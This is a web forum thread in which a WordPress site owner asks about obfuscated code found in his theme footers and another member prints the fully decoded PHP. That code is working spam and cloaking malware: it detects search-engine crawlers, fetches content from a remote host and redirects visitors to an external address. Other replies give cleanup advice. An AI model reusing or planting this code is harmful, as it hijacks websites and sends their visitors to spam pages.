1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Base64 decoded

Discussion in 'PHP & Perl' started by Darksider, Mar 4, 2014.

  1. Darksider

    Darksider Registered Member

    Joined:
    Jun 16, 2010
    Messages:
    81
    Likes Received:
    31
    Location:
    Europa
    Hello, I found on all my wordpress themas some junk base64 code in the footer, Can somebody check this code and tel what this code doit on my site?Thanks.Code is on pastebin.
    Code:
    http://pastebin.com/4mc5xWZX
     
  2. SEOGrenoble

    SEOGrenoble Junior Member

    Joined:
    Aug 15, 2011
    Messages:
    116
    Likes Received:
    18
    Home Page:
    Just replace "eval" by "print" and you will get the php code executed by the hacker.
     
    • Thanks Thanks x 1
  3. thebigweb

    thebigweb Jr. VIP Jr. VIP Premium Member

    Joined:
    Nov 19, 2007
    Messages:
    251
    Likes Received:
    107
    Location:
    The Moon
    Home Page:
    It looks dodgy so I would remove it. Here is the actual code decoded: -

    Code:
    if (!defined('frmDs')){
    	define('frmDs' ,1);
    	error_reporting(0);
    	
    	function frm_dl ($url) {
    		if (function_exists('curl_init')) {
    			$ch = curl_init($url);
    			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    			$out = curl_exec ($ch);
    			if (curl_errno($ch) !== 0) $out = false;
    			curl_close ($ch);
    		} else {$out = @file_get_contents($url);}
    		return trim($out);
    	}
    	
    	function frm_crpt($in){
    		$il=strlen($in);$o='';
    		for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
    		return $o;
    	}
    	
    	function frm_getcache($tmpdir,$link,$cmtime,$toe=false){
    		$f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
    		$fe = file_exists($f);
    		if(!$fe || time() - filemtime($f) > 60 * $cmtime)
    		{
    			$dlc=frm_dl($link);
    			if($fe && $dlc===false) 
    				@touch($f);
    			else
    			{
    				if($fe && empty($dlc) && $toe) 
    				{
    					@touch($f);
    				}
    				else
    				{
    					if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);}
    					else{return $dlc;}
    				}
    			}
    		}
    		$fc = @file_get_contents($f);
    		return ($fc)?frm_crpt($fc):'';
    	}
    	
    	function frm_isbot(){
    		$ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
    		if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; 
    		$rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
    					array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
    					array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247));
    		foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
    		if(!$ua)return true;
    		$bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
    		foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
    		$h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
    		$hba=array('google','msn','yahoo');
    		if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
    		return false;
    	}
    	
    	function frm_tmpdir(){
    		$fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
            foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
                if ($t = getenv($v)) {$fs[]=$t;}
            }
            if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
            $fs[]='.';
            
            foreach ($fs as $f){
            	$tf = $f.'/'.md5(rand());
            	if($fp = @fopen($tf, 'w')){
            		fclose($fp);
            		unlink($tf);
            		return $f;
            	}
            }
    		return false;
    	}
    
    	function frm_seref(){
    		$r = @strtolower($_SERVER["HTTP_REFERER"]);
    		$ses = array('google','bing','yahoo','ask','aol');
    		foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
    		return false;
    	}
    	
    	function frm_havekey($s=false){
    		$nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
    		$k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s;
    		if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return '';
    		foreach ($nks as $n)if(preg_match("/(\b|_)$n(\b|_)/" , $k)) return $n;
    		return '';
    	}
    	
    	function frm_strtonum($Str, $Check, $Magic) {
    		$Int32Unit = 4294967296;
    		$length = strlen($Str);
    		for ($i = 0; $i < $length; $i++) {
    			$Check *= $Magic;
    			if ($Check >= $Int32Unit) {
    				$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
    				$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
    			}
    			$Check += ord($Str{$i});
    		}
    		return $Check;
    	}
    
    	function frm_chhash($String) {
    		$Check1 =frm_strtonum($String, 0x1505, 0x21);
    		$Check2 = frm_strtonum($String, 0, 0x1003F);
    		$Check1 >>= 2;
    		$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
    		$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
    		$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
    		$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
    		$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
    		$Hashnum = ($T1 | $T2);
    		$CheckByte = 0;
    		$Flag = 0;
    		$HashStr = sprintf('%u', $Hashnum) ;
    		$length = strlen($HashStr);
    		for ($i = $length - 1;  $i >= 0;  $i --) {
    			$Re = $HashStr{$i};
    			if (1 === ($Flag % 2)) {
    				$Re += $Re;
    				$Re = (int)($Re / 10) + ($Re % 10);
    			}
    			$CheckByte += $Re;
    			$Flag ++;
    		}
    		$CheckByte %= 10;
    		if (0 !== $CheckByte) {
    			$CheckByte = 10 - $CheckByte;
    			if (1 === ($Flag % 2) ) {
    				if (1 === ($CheckByte % 2)) {
    					$CheckByte += 9;
    				}
    				$CheckByte >>= 1;
    			}
    		}
    		return '7'.$CheckByte.$HashStr;
    	}
    	
    	function frm_chpr($url,$td){
    		$ch=frm_chhash($url);
    		$res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
    		if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
    	}
    	
    	function frm_red($k){
    		if(!frm_isbot() && frm_seref()){
    			$r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
    			$s=@urlencode($_SERVER['HTTP_REFERER']);
    			die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
    		}
    	}
    	
    	$tdir = frm_tmpdir();
    	$isb=frm_isbot();
    	$k=frm_havekey();
    	$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
    	if($cv=@$_POST[md5($host.'ch')]){exit($cv);}
    	if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){
    		$parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
    		$sp = "http://pkurkamjfosr.byinter.net/stat/feed.php?pa=$parg&h=$host";
    		//
    		$tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
    		if($isb && ($ppr = frm_chpr($tp)) > 1){
    			$pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
    			if($pc) die($pc);
    		}
    		//
    		$ruri = strtolower($_SERVER['REQUEST_URI']);
    		$pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
    		if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
    			frm_red($k);
    			die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
    		}	
    		if (($ruri=='/' || $ruri=='/index.php') && $isb) {
    			$c=frm_getcache($tdir, $sp ,60*24);
    			if($c)die($c);
    		}
    		//
    		if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
    			if(strpos($sdl, '|'.$ruri.'|') !== false){
    				frm_red($k);
    				die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
    			}
    		}
    	}
    	if($k) frm_red($k);
    }
     
    • Thanks Thanks x 1
  4. Darksider

    Darksider Registered Member

    Joined:
    Jun 16, 2010
    Messages:
    81
    Likes Received:
    31
    Location:
    Europa
    Thanks for that, I am not a programer so I don't know what this code do in my site in footer.php.I check all my site on the server and all themes on foter.php have this junk code.
    This code I probably get with some nulled themplate or plugin.How to find the script wich auto postet in this code in my files?I am truly grateful for the help
     
  5. thebigweb

    thebigweb Jr. VIP Jr. VIP Premium Member

    Joined:
    Nov 19, 2007
    Messages:
    251
    Likes Received:
    107
    Location:
    The Moon
    Home Page:
    It could be that your cPanel or your shared hosting has been hacked. If I were you I would first change all ftp passwords. Then change your cPanel password. Download all the files to your computer and use a find and replace tool to locate the code and replace on mass. Re-upload when you are sure you have removed everything. Also, check if any new files have been uploaded recently as there maybe a backdoor php shell script that will allow the hackers back in even if you change the passwords. Chances are though that this is just a hacked theme or plugin but its better to be safe than sorry!

    **** Make sure you backup everything before you do this though just in case anything goes wrong!
     
    • Thanks Thanks x 1
  6. Darksider

    Darksider Registered Member

    Joined:
    Jun 16, 2010
    Messages:
    81
    Likes Received:
    31
    Location:
    Europa
    I change my cpanel password, ftp I don't use, this code I found in 365 files and delete all the code than uploaded in the server and all is normaly working.I hope, that I don't get this code again in my files tomorow :) Thanks again the bigweb. Is there any wordpress plugin, which is a good from malware, shells etc...